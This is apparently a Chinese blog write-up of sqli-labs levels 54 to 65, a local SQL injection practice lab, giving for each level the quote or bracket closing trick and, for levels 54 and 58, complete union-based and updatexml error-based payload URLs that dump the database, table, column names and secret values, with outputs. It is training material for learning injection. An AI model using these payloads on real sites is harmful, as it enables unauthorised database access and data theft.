0x00 前言
最后一个阶段了,继续干活
0x01 干活
Less-54
这题好像有次数限制,最多只能十次。但是经测试可能是单引号闭合的,于是payload:
http://localhost/sqli/Less-54/?id=1' and 1=1--+
利用:
1.爆库名:
http://localhost/sqli/Less-54/?id=-1' union select 1,2,database()--+
2.爆表名:(challenges )
1 | http://localhost/sqli/Less-54/?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x6368616c6c656e676573)--+ |
3.爆列名:(qzwhq5oriy )
1 | http://localhost/sqli/Less-54/?id=-1' union select 1,2,(SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x717a776871356f726979)--+ |
4.爆数据:
1 | http://localhost/sqli/Less-54/?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(sessid,0x3a,secret_XXB8+SEPARATOR+0x3c62723e)+FROM+challenges.qzwhq5oriy)--+ |
回显db24b263eea4a88462e36e5785715584:URkF4dF3X0PsKdSZR67TKWbQ
Less-55
尝试了好几次后,利用括号成功闭合了,payload:
http://localhost/sqli/Less-55/?id=1) and 1=1--+
而且是报错型的,利用方式可以跟上面一样。
Less-56
与上面一样,只要括号+引号闭合即可。payload:
http://localhost/sqli/Less-56/?id=1') and 1=1--+
同样是报错型的,利用方式可以跟上面一样。
Less-57
与上面一样,只是双引号闭合即可。payload:
http://localhost/sqli/Less-57/?id=1" and 1=1--+
同样是报错型的,常规操作,利用方式可以跟上面一样。
Less-58
与上面一样,只利用了单引号闭合。payload:
http://localhost/sqli/Less-58/?id=1' and 1=1--+
1.爆库:
1 | http://localhost/sqli/Less-58/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ |
回显XPATH syntax error: '~challenges~'
2.爆表:
1 | http://localhost/sqli/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+ |
回显XPATH syntax error: '~5ss6gttnz1~
3.爆列名:
1 | http://localhost/sqli/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_name='5ss6gttnz1'),0x7e),1)--+ |
回显XPATH syntax error: '~id,sessid,secret_2M3X,tryy~'
4.爆数据:
1 | http://localhost/sqli/Less-58/?id=1' and updatexml(1,concat(0x7e,(select secret_2M3X from 5ss6gttnz1),0x7e),1)--+ |
回显:XPATH syntax error: '~VAVJzFouSyjZX3ckJiJRNf95~'
Less-59
跟往题一样,没有用其他符合进行闭合。于是,payload:
http://localhost/sqli/Less-59/?id=1 and 1=1--+
后面就是常规套路了。
Less-60
这里利用了双引号+括号的闭合方式。于是,payload:
http://localhost/sqli/Less-60/?id=1") and 1=1-+
后面就是常规套路了。
Less-61
测试过程中,得到回显near ''1'')) LIMIT 0,1' at line 1发现是单引号+双括号进行闭合。于是,payload:
http://localhost/sqli/Less-61/?id=1')) and 1=1--+
后面就是常规套路了。
Less-62
这里跟其他的不大一样的是,这题是单引号+括号的布尔型盲注。没有回显,payload:
http://localhost/sqli/Less-62/?id=1') and 1=1--+
利用方式跟之前盲注类似。
Less-63
与上一题一样,只是用来单引号进行闭合的盲注。payload:
http://localhost/sqli/Less-63/?id=1' and 1=1--+
利用方式跟之前盲注类似。
Less-64
闭合方式不一样,为双括号闭合。payload:
http://localhost/sqli/Less-64/?id=1)) and 1=1--+
利用方式跟之前盲注类似。
Less-65
闭合方式不一样,为双引号+括号进行闭合的。payload:
http://localhost/sqli/Less-65/?id=1") and 1=1--+
利用方式跟之前盲注类似。
0x02 后记
为期好几天的SQL天书也终于完结了,学到了不少东西。虽然题目比较多,但是大部分比较基础,对SQL注入的理解有很大的帮助。